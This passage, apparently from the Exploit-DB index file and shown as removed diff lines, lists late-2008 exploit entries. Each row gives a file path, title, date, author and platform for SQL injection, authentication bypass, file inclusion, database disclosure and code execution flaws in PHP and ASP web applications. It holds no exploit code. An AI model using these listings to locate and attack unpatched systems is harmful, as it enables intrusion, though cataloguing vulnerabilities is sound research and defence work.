-7242,exploits/php/webapps/7242.txt,"Web Calendar System 3.12/3.30 - Multiple Vulnerabilities",2008-11-27,Bl@ckbe@rD,php,webapps, -7243,exploits/php/webapps/7243.php,"Star Articles 6.0 - Blind SQL Injection (2)",2008-11-27,Stack,php,webapps, -7244,exploits/php/webapps/7244.txt,"Ocean12 Contact Manager Pro - SQL Injection / Cross-Site Scripting / File Disclosure",2008-11-27,Pouya_Server,php,webapps, -7245,exploits/php/webapps/7245.txt,"Ocean12 Membership Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps, -7246,exploits/php/webapps/7246.txt,"Ocean12 Poll Manager Pro - Database Disclosure",2008-11-27,Pouya_Server,php,webapps, -7247,exploits/php/webapps/7247.txt,"Ocean12 Calendar Manager Gold - Database Disclosure",2008-11-27,Pouya_Server,php,webapps, -7248,exploits/php/webapps/7248.txt,"Family Project 2.x - Authentication Bypass",2008-11-27,The_5p3ctrum,php,webapps, -7250,exploits/php/webapps/7250.txt,"RakhiSoftware Shopping Cart - SQL Injection",2008-11-27,XaDoS,php,webapps, -7251,exploits/php/webapps/7251.txt,"Star Articles 6.0 - Arbitrary File Upload",2008-11-27,ZoRLu,php,webapps, -7252,exploits/php/webapps/7252.txt,"Web Calendar 4.1 - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps, -7253,exploits/php/webapps/7253.txt,"Booking Centre 2.01 - 'HotelID' SQL Injection",2008-11-27,R3d-D3V!L,php,webapps, -7254,exploits/php/webapps/7254.txt,"Ocean12 Membership Manager Pro - Authentication Bypass",2008-11-27,Cyber-Zone,php,webapps, -7255,exploits/php/webapps/7255.txt,"pagetree CMS 0.0.2 Beta 0001 - Remote File Inclusion",2008-11-27,NoGe,php,webapps, -7256,exploits/php/webapps/7256.txt,"Turnkey Arcade Script - SQL Injection (1)",2008-11-27,The_5p3ctrum,php,webapps, -7258,exploits/php/webapps/7258.txt,"Ocean12 FAQ Manager Pro - Database Disclosure",2008-11-27,Stack,php,webapps, -7259,exploits/asp/webapps/7259.txt,"Comersus ASP Shopping Cart - File Disclosure / Cross-Site Scripting",2008-11-27,Bl@ckbe@rD,asp,webapps, -7260,exploits/php/webapps/7260.txt,"Basic-CMS - Remote Database Disclosure",2008-11-28,Stack,php,webapps, -7261,exploits/php/webapps/7261.txt,"Basic-CMS - Blind SQL Injection",2008-11-28,"CWH Underground",php,webapps, -7263,exploits/php/webapps/7263.txt,"Booking Centre 2.01 - Authentication Bypass",2008-11-28,MrDoug,php,webapps, -7265,exploits/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps, -7266,exploits/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Configuration Retrieve",2008-11-28,StAkeR,php,webapps, -7267,exploits/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,php,webapps, -7268,exploits/php/webapps/7268.txt,"Bluo CMS 1.2 - Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps, -7269,exploits/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' SQL Injection",2008-11-28,"CWH Underground",php,webapps, -7270,exploits/php/webapps/7270.txt,"ReVou Twitter Clone - Authentication Bypass",2008-11-28,R3d-D3V!L,php,webapps, -7271,exploits/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro - 'ID' Blind SQL Injection",2008-11-28,Stack,php,webapps, -7273,exploits/asp/webapps/7273.txt,"Active Force Matrix 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7274,exploits/asp/webapps/7274.txt,"ASPReferral 5.3 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps, -7275,exploits/asp/webapps/7275.txt,"ActiveVotes 2.2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7276,exploits/asp/webapps/7276.txt,"Active Test 2.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7277,exploits/asp/webapps/7277.txt,"Active Websurvey 9.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7278,exploits/asp/webapps/7278.txt,"Active Membership 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7279,exploits/asp/webapps/7279.txt,"eWebquiz 8 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7280,exploits/asp/webapps/7280.txt,"Active NewsLetter 4.3 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7281,exploits/asp/webapps/7281.txt,"Active Web Mail 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7282,exploits/asp/webapps/7282.txt,"Active Trade 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7283,exploits/asp/webapps/7283.txt,"Active Price Comparison 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps, -7284,exploits/php/webapps/7284.txt,"PHP TV Portal 2.0 - 'mid' SQL Injection",2008-11-29,Cyber-Zone,php,webapps, -7285,exploits/php/webapps/7285.txt,"CMS Made Simple 1.4.1 - Local File Inclusion",2008-11-29,M4ck-h@cK,php,webapps, -7286,exploits/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Configuration File Disclosure",2008-11-29,ahmadbady,php,webapps, -7287,exploits/asp/webapps/7287.txt,"ActiveVotes 2.2 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps, -7288,exploits/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps, -7289,exploits/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps, -7290,exploits/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Blind SQL Injection",2008-11-29,Stack,php,webapps, -7291,exploits/php/webapps/7291.pl,"OpenForum 0.66 Beta - Remote Reset Admin Password",2008-11-29,"CWH Underground",php,webapps, -7292,exploits/asp/webapps/7292.txt,"ASPThai.Net Forum 8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",asp,webapps, -7293,exploits/asp/webapps/7293.txt,"Active Web Helpdesk 2 - Authentication Bypass",2008-11-29,Cyber-Zone,asp,webapps, -7294,exploits/php/webapps/7294.pl,"Lito Lite CMS - 'cid' SQL Injection",2008-11-29,"CWH Underground",php,webapps, -7295,exploits/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps, -7298,exploits/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps, -7299,exploits/php/webapps/7299.txt,"Active Photo Gallery 6.2 - Authentication Bypass",2008-11-30,R3d-D3V!L,php,webapps, -7301,exploits/php/webapps/7301.txt,"Active Time Billing 3.2 - Authentication Bypass",2008-11-30,AlpHaNiX,php,webapps, -7302,exploits/php/webapps/7302.txt,"Active Business Directory 2 - Blind SQL Injection",2008-11-30,AlpHaNiX,php,webapps, -7303,exploits/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - Database Disclosure",2008-11-30,Cyber-Zone,php,webapps, -7304,exploits/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps, -7305,exploits/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps, -7306,exploits/php/webapps/7306.txt,"minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass",2008-11-30,NoGe,php,webapps, -7308,exploits/php/webapps/7308.txt,"CPCommerce 1.2.6 - URL Rewrite Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps, -7310,exploits/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusions",2008-11-30,NoGe,php,webapps, -7311,exploits/php/webapps/7311.txt,"z1exchange 1.0 - 'site' SQL Injection",2008-12-01,JIKO,php,webapps, -7312,exploits/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps, -7315,exploits/php/webapps/7315.txt,"E.Z. Poll 2 - Authentication Bypass",2008-12-01,t0fx,php,webapps, -7316,exploits/asp/webapps/7316.txt,"ASPPortal 3.2.5 - Database Disclosure",2008-12-01,"CWH Underground",asp,webapps, -7317,exploits/php/webapps/7317.pl,"bcoos 1.0.13 - 'viewcat.php' SQL Injection",2008-12-01,"CWH Underground",php,webapps, -7318,exploits/php/webapps/7318.txt,"PacPoll 4.0 - Database Disclosure",2008-12-01,AlpHaNiX,php,webapps, -7319,exploits/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps, -7322,exploits/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook - Remote Command Execution",2008-12-02,"CWH Underground",php,webapps, -7323,exploits/php/webapps/7323.txt,"SunByte e-Flower - 'id' SQL Injection",2008-12-02,w4rl0ck,php,webapps, -7324,exploits/php/webapps/7324.txt,"Rapid Classified 3.1 - Database Disclosure",2008-12-02,CoBRa_21,php,webapps, -7325,exploits/asp/webapps/7325.txt,"Codefixer MailingListPro - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps, -7326,exploits/asp/webapps/7326.txt,"Gallery MX 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps, -7327,exploits/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps, -7328,exploits/php/webapps/7328.pl,"Check New 4.52 - SQL Injection",2008-12-03,"CWH Underground",php,webapps, -7331,exploits/php/webapps/7331.pl,"Joomla! Component JMovies 1.1 - 'id' SQL Injection",2008-12-03,StAkeR,php,webapps, -7332,exploits/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps, -7333,exploits/php/webapps/7333.txt,"Rae Media Contact MS - Authentication Bypass",2008-12-03,b3hz4d,php,webapps, -7335,exploits/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - Remote File Inclusion",2008-12-03,NoGe,php,webapps, -7336,exploits/php/webapps/7336.txt,"ccTiddly 1.7.4 - 'cct_base' Remote File Inclusion",2008-12-04,cOndemned,php,webapps, -7337,exploits/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",php,webapps, -7338,exploits/php/webapps/7338.txt,"User Engine Lite ASP - 'users.mdb' Database Disclosure",2008-12-04,AlpHaNiX,php,webapps, -7339,exploits/php/webapps/7339.txt,"template creature - SQL Injection / File Disclosure",2008-12-04,ZoRLu,php,webapps, -7340,exploits/asp/webapps/7340.txt,"Easy News Content Management - Database Disclosure",2008-12-04,BeyazKurt,asp,webapps, -7341,exploits/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,php,webapps, -7342,exploits/php/webapps/7342.txt,"My Simple Forum 3.0 - Local File Inclusion",2008-12-04,cOndemned,php,webapps, -7343,exploits/php/webapps/7343.txt,"Joomla! Component mydyngallery 1.4.2 - SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps, -7344,exploits/php/webapps/7344.txt,"Gravity GTD 0.4.5 - Local File Inclusion / Remote Code Execution",2008-12-04,dun,php,webapps, -7345,exploits/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps, -7346,exploits/php/webapps/7346.txt,"Multiple Membership Script 2.5 - 'id' SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps, -7348,exploits/asp/webapps/7348.txt,"merlix educate servert - Authentication Bypass / File Disclosure",2008-12-05,ZoRLu,asp,webapps, -7349,exploits/asp/webapps/7349.txt,"RankEm - 'siteID' SQL Injection",2008-12-05,AlpHaNiX,asp,webapps, -7350,exploits/asp/webapps/7350.txt,"Rankem - Authentication Bypass",2008-12-05,AlpHaNiX,asp,webapps, -7351,exploits/php/webapps/7351.txt,"nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure",2008-12-05,AlpHaNiX,php,webapps, -7352,exploits/php/webapps/7352.txt,"Merlix Teamworx Server - File Disclosure/Bypass",2008-12-05,ZoRLu,php,webapps, -7353,exploits/asp/webapps/7353.txt,"Cold BBS - Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps, -7354,exploits/php/webapps/7354.txt,"Tizag Countdown Creator 3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps, -7356,exploits/asp/webapps/7356.txt,"ASP AutoDealer - SQL Injection / File Disclosure",2008-12-05,AlpHaNiX,asp,webapps, -7357,exploits/asp/webapps/7357.txt,"ASP Portal - Multiple SQL Injections",2008-12-05,AlpHaNiX,asp,webapps, -7359,exploits/asp/webapps/7359.txt,"ASPTicker 1.0 - Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps, -7360,exploits/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps, -7361,exploits/asp/webapps/7361.txt,"ASP PORTAL - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps, -7363,exploits/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - '_language' Local File Inclusion",2008-12-06,dun,php,webapps, -7364,exploits/php/webapps/7364.php,"IPNPro3 < 1.44 - Admin Password Changing",2008-12-07,G4N0K,php,webapps, -7365,exploits/php/webapps/7365.php,"DL PayCart 1.34 - Admin Password Changing",2008-12-07,G4N0K,php,webapps, -7366,exploits/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing",2008-12-07,G4N0K,php,webapps, -7367,exploits/php/webapps/7367.php,"PayPal eStore - Admin Password Change",2008-12-07,G4N0K,php,webapps, -7368,exploits/php/webapps/7368.txt,"Product Sale Framework 0.1b - SQL Injection",2008-12-07,b3hz4d,php,webapps, -7369,exploits/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion",2008-12-07,DNX,php,webapps, -7370,exploits/asp/webapps/7370.txt,"Natterchat 1.12 - Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps, -7371,exploits/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps, -7372,exploits/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps, -7373,exploits/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps, -7374,exploits/php/webapps/7374.txt,"Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusions",2008-12-07,cOndemned,php,webapps, -7375,exploits/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Local File Inclusion",2008-12-07,cOndemned,php,webapps, -7376,exploits/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps, -7377,exploits/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - 'index.php' Directory Traversal",2008-12-07,zAx,php,webapps, -7378,exploits/asp/webapps/7378.txt,"asp talk - SQL Injection / Cross-Site Scripting",2008-12-07,Bl@ckbe@rD,asp,webapps, -7379,exploits/php/webapps/7379.txt,"MG2 0.5.1 - 'filename' Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps, -7380,exploits/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusions",2008-12-08,DSecRG,php,webapps, -7381,exploits/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps, -7382,exploits/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - Cross-Site Request Forgery / SQL Injection",2008-12-08,"Michael Brooks",php,webapps, -7383,exploits/php/webapps/7383.txt,"Simple Directory Listing 2 - Cross-Site Arbitrary File Upload",2008-12-08,"Michael Brooks",php,webapps, -7385,exploits/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps, -7386,exploits/php/webapps/7386.pl,"phpBB 3 - Mod Tag Board 4 Blind SQL Injection",2008-12-08,StAkeR,php,webapps, -7388,exploits/php/webapps/7388.txt,"webcaf 1.4 - Local File Inclusion / Remote Code Execution",2008-12-08,dun,php,webapps, -7390,exploits/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - Authentication Bypass",2008-12-09,ZoRLu,asp,webapps, -7391,exploits/asp/webapps/7391.txt,"Poll Pro 2.0 - Authentication Bypass",2008-12-09,AlpHaNiX,asp,webapps, -7392,exploits/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Local/Remote File Inclusion",2008-12-09,ZoRLu,php,webapps, -7395,exploits/php/webapps/7395.txt,"Peel Shopping 3.1 - 'rubid' SQL Injection",2008-12-09,SuB-ZeRo,php,webapps, -7396,exploits/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,php,webapps, -7397,exploits/php/webapps/7397.txt,"ProQuiz 1.0 - Authentication Bypass",2008-12-09,Osirys,php,webapps, -7398,exploits/asp/webapps/7398.txt,"postecards - SQL Injection / File Disclosure",2008-12-09,AlpHaNiX,asp,webapps, -7399,exploits/php/webapps/7399.txt,"PHPmyGallery 1.5beta - '/common-tpl-vars.php' Local/Remote File Inclusion",2008-12-09,CoBRa_21,php,webapps, -7400,exploits/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting",2008-12-09,ahmadbady,php,webapps, -7404,exploits/cgi/webapps/7404.txt,"HTMPL 1.11 - Command Execution",2008-12-10,ZeN,cgi,webapps, -7406,exploits/php/webapps/7406.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps, -7407,exploits/php/webapps/7407.txt,"WebMaster Marketplace - SQL Injection",2008-12-10,"Hussin X",php,webapps, -7408,exploits/php/webapps/7408.txt,"living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload",2008-12-10,Bgh7,php,webapps, -7409,exploits/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery",2008-12-10,ZynbER,php,webapps, -7411,exploits/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' SQL Injection",2008-12-10,Osirys,php,webapps, -7412,exploits/asp/webapps/7412.txt,"cf shopkart 5.2.2 - SQL Injection / File Disclosure",2008-12-10,AlpHaNiX,asp,webapps, -7413,exploits/asp/webapps/7413.pl,"CF_Calendar - 'calendarevent.cfm' SQL Injection",2008-12-10,AlpHaNiX,asp,webapps, -7414,exploits/asp/webapps/7414.txt,"CF_Auction - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps, -7415,exploits/asp/webapps/7415.txt,"CFMBLOG - 'categorynbr' Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps, -7416,exploits/asp/webapps/7416.txt,"CF_Forum - Blind SQL Injection",2008-12-10,AlpHaNiX,asp,webapps, -7417,exploits/php/webapps/7417.txt,"phpAddEdit 1.3 - 'editform' Local File Inclusion",2008-12-10,nuclear,php,webapps, -7418,exploits/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Authentication Bypass",2008-12-11,x0r,php,webapps, -7419,exploits/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps, -7420,exploits/asp/webapps/7420.txt,"MyCal Personal Events Calendar - Database Disclosure",2008-12-11,CoBRa_21,asp,webapps, -7421,exploits/php/webapps/7421.txt,"EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps, -7422,exploits/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - 'lang' Local File Inclusion",2008-12-11,x0r,php,webapps, -7423,exploits/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps, -7424,exploits/asp/webapps/7424.txt,"Ad Management Java - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps, -7425,exploits/asp/webapps/7425.txt,"Banner Exchange Java - Authentication Bypass",2008-12-11,R3d-D3V!L,asp,webapps, -7426,exploits/php/webapps/7426.txt,"PHP Support Tickets 2.2 - Arbitrary File Upload",2008-12-11,ahmadbady,php,webapps, -7427,exploits/asp/webapps/7427.txt,"The Net Guys ASPired2Poll - Remote Database Disclosure",2008-12-11,AlpHaNiX,asp,webapps, -7428,exploits/asp/webapps/7428.txt,"The Net Guys ASPired2Protect - Database Disclosure",2008-12-12,AlpHaNiX,asp,webapps, -7429,exploits/asp/webapps/7429.txt,"ASP-CMS 1.0 - 'cha' SQL Injection",2008-12-12,"Khashayar Fereidani",asp,webapps, -7430,exploits/php/webapps/7430.txt,"SUMON 0.7.0 - Command Execution",2008-12-12,dun,php,webapps, -7432,exploits/php/webapps/7432.txt,"Xpoze 4.10 - 'menu' Blind SQL Injection",2008-12-12,XaDoS,php,webapps, -7433,exploits/php/webapps/7433.txt,"Social Groupie - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps, -7434,exploits/php/webapps/7434.sh,"Wysi Wiki Wyg 1.0 - Remote Password Retrieve",2008-12-12,StAkeR,php,webapps, -7435,exploits/php/webapps/7435.txt,"Social Groupie - 'create_album.php' Arbitrary File Upload",2008-12-12,InjEctOr5,php,webapps, -7436,exploits/asp/webapps/7436.txt,"the net guys aspired2blog - SQL Injection / File Disclosure",2008-12-12,Pouya_Server,asp,webapps, -7437,exploits/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution",2008-12-12,USH,php,webapps, -7438,exploits/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 - Database Disclosure",2008-12-12,Dxil,asp,webapps, -7439,exploits/php/webapps/7439.txt,"Umer Inc Songs Portal Script - 'id' SQL Injection",2008-12-12,InjEctOr5,php,webapps, -7440,exploits/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure",2008-12-12,Cyber-Zone,asp,webapps, -7441,exploits/php/webapps/7441.txt,"Joomla! Component live chat - SQL Injection / Open Proxy",2008-12-12,jdc,php,webapps, -7443,exploits/php/webapps/7443.txt,"FlexPHPNews 0.0.6 / PRO - Authentication Bypass",2008-12-14,Osirys,php,webapps, -7444,exploits/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - File Disclosure / Remote File Inclusion",2008-12-14,Osirys,php,webapps, -7445,exploits/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps, -7446,exploits/asp/webapps/7446.txt,"ASPired2Quote - Remote Database Disclosure",2008-12-14,Pouya_Server,asp,webapps, -7447,exploits/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System - Authentication Bypass",2008-12-14,Pouya_Server,asp,webapps, -7448,exploits/php/webapps/7448.txt,"autositephp 2.0.3 - Local File Inclusion / Cross-Site Request Forgery / Edit File",2008-12-14,SirGod,php,webapps, -7449,exploits/php/webapps/7449.txt,"iyzi Forum 1.0b3 - Database Disclosure",2008-12-14,"Ghost Hacker",php,webapps, -7450,exploits/asp/webapps/7450.txt,"CodeAvalanche FreeForum - Database Disclosure",2008-12-14,"Ghost Hacker",asp,webapps, -7451,exploits/php/webapps/7451.txt,"PHP weather 2.2.2 - Local File Inclusion / Cross-Site Scripting",2008-12-14,ahmadbady,php,webapps, -7453,exploits/php/webapps/7453.txt,"FLDS 1.2a - 'redir.php' SQL Injection",2008-12-14,nuclear,php,webapps, -7455,exploits/php/webapps/7455.txt,"The Rat CMS Alpha 2 - 'download.php' Priviledge Escalation",2008-12-14,x0r,php,webapps, -7456,exploits/php/webapps/7456.txt,"AvailScript Article Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps, -7457,exploits/php/webapps/7457.txt,"AvailScript Classmate Script - Arbitrary File Upload",2008-12-14,S.W.A.T.,php,webapps, -7458,exploits/php/webapps/7458.txt,"Mediatheka 4.2 - 'lang' Local File Inclusion",2008-12-14,Osirys,php,webapps, -7459,exploits/php/webapps/7459.txt,"CFAGCMS 1 - Remote File Inclusion",2008-12-14,BeyazKurt,php,webapps, -7461,exploits/php/webapps/7461.txt,"Flatnux - html/JavaScript Injection Cookie Grabber",2008-12-14,gmda,php,webapps, -7462,exploits/asp/webapps/7462.txt,"ASPSiteWare Home Builder 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps, -7463,exploits/php/webapps/7463.txt,"ASPSiteWare Automotive Dealer 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,php,webapps, -7464,exploits/asp/webapps/7464.txt,"ASPSiteWare RealtyListing 1.0/2.0 - SQL Injection",2008-12-14,AlpHaNiX,asp,webapps, -7465,exploits/php/webapps/7465.txt,"isweb CMS 3.0 - SQL Injection / Cross-Site Scripting",2008-12-14,XaDoS,php,webapps, -7466,exploits/asp/webapps/7466.txt,"Forest Blog 1.3.2 - Remote Database Disclosure",2008-12-15,"Cold Zero",asp,webapps, -7468,exploits/asp/webapps/7468.txt,"CodeAvalanche Directory - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps, -7469,exploits/asp/webapps/7469.txt,"CodeAvalanche FreeForAll - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps, -7470,exploits/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps, -7471,exploits/asp/webapps/7471.txt,"CodeAvalanche Articles - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps, -7472,exploits/asp/webapps/7472.txt,"CodeAvalanche RateMySite - Database Disclosure",2008-12-15,Pouya_Server,asp,webapps, -7473,exploits/php/webapps/7473.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - 'token' Privilege Escalation",2008-12-15,s4avrd0w,php,webapps, -7474,exploits/php/webapps/7474.txt,"FLDS 1.2a - 'lpro.php' SQL Injection",2008-12-15,nuclear,php,webapps, -7475,exploits/php/webapps/7475.txt,"BabbleBoard 1.1.6 - Cross-Site Request Forgery/Cookie Grabber",2008-12-15,SirGod,php,webapps, -7476,exploits/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,php,webapps, -7478,exploits/php/webapps/7478.txt,"The Rat CMS Alpha 2 - Authentication Bypass",2008-12-15,x0r,php,webapps, -7479,exploits/php/webapps/7479.txt,"XOOPS Module Amevents - SQL Injection",2008-12-15,nétRoot,php,webapps, -7480,exploits/php/webapps/7480.txt,"CadeNix - SQL Injection",2008-12-15,HaCkeR_EgY,php,webapps, -7481,exploits/php/webapps/7481.txt,"WorkSimple 1.2.1 - Remote File Inclusion / Sensitive Data Disclosure",2008-12-15,Osirys,php,webapps, -7482,exploits/php/webapps/7482.txt,"Aperto Blog 0.1.1 - Local File Inclusion / SQL Injection",2008-12-15,NoGe,php,webapps, -7483,exploits/php/webapps/7483.txt,"CFAGCMS 1 - SQL Injection",2008-12-15,ZoRLu,php,webapps, -7484,exploits/asp/webapps/7484.txt,"Click&BaneX - Multiple SQL Injections",2008-12-15,AlpHaNiX,asp,webapps, -7485,exploits/asp/webapps/7485.txt,"clickandemail - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps, -7486,exploits/asp/webapps/7486.txt,"Click&Rank - SQL Injection / Cross-Site Scripting",2008-12-15,AlpHaNiX,asp,webapps, -7487,exploits/php/webapps/7487.txt,"FaScript FaUpload - SQL Injection",2008-12-16,"Aria-Security Team",php,webapps, -7488,exploits/asp/webapps/7488.txt,"Web Wiz Guestbook 8.21 - Database Disclosure",2008-12-16,"Cold Zero",asp,webapps, -7489,exploits/php/webapps/7489.pl,"FLDS 1.2a - 'report.php' SQL Injection",2008-12-16,ka0x,php,webapps, -7490,exploits/php/webapps/7490.php,"Aiyoota! CMS - Blind SQL Injection",2008-12-16,Lidloses_Auge,php,webapps, -7491,exploits/asp/webapps/7491.txt,"Nukedit 4.9.8 - Remote Database Disclosure",2008-12-16,Cyber.Zer0,asp,webapps, -7493,exploits/php/webapps/7493.txt,"Liberum Help Desk 0.97.3 - SQL Injection / File Disclosure",2008-12-16,"Cold Zero",php,webapps, -7494,exploits/php/webapps/7494.txt,"Zelta E Store - Arbitrary File Upload / Bypass / SQL Injection / Blind SQL Injection",2008-12-16,ZoRLu,php,webapps, -7495,exploits/asp/webapps/7495.txt,"Gnews Publisher .NET - SQL Injection",2008-12-16,AlpHaNiX,asp,webapps, -7497,exploits/php/webapps/7497.txt,"RSMScript 1.21 - Cross-Site Scripting / Insecure Cookie Handling",2008-12-17,Osirys,php,webapps, -7499,exploits/asp/webapps/7499.txt,"BP Blog 6.0/7.0/8.0/9.0 - Remote Database Disclosure",2008-12-17,Dxil,asp,webapps, -7500,exploits/php/webapps/7500.txt,"K&S Shopsysteme - Arbitrary File Upload",2008-12-17,mNt,php,webapps, -7502,exploits/php/webapps/7502.txt,"r.cms 2.0 - Multiple SQL Injections",2008-12-17,Lidloses_Auge,php,webapps, -7504,exploits/php/webapps/7504.txt,"Joomla! Component Tech Article 1.x - SQL Injection",2008-12-17,InjEctOr5,php,webapps, -7506,exploits/php/webapps/7506.txt,"TinyMCE 2.0.1 - 'menuID' SQL Injection",2008-12-17,AnGeL25dZ,php,webapps, -7507,exploits/php/webapps/7507.pl,"Lizardware CMS 0.6.0 - Blind SQL 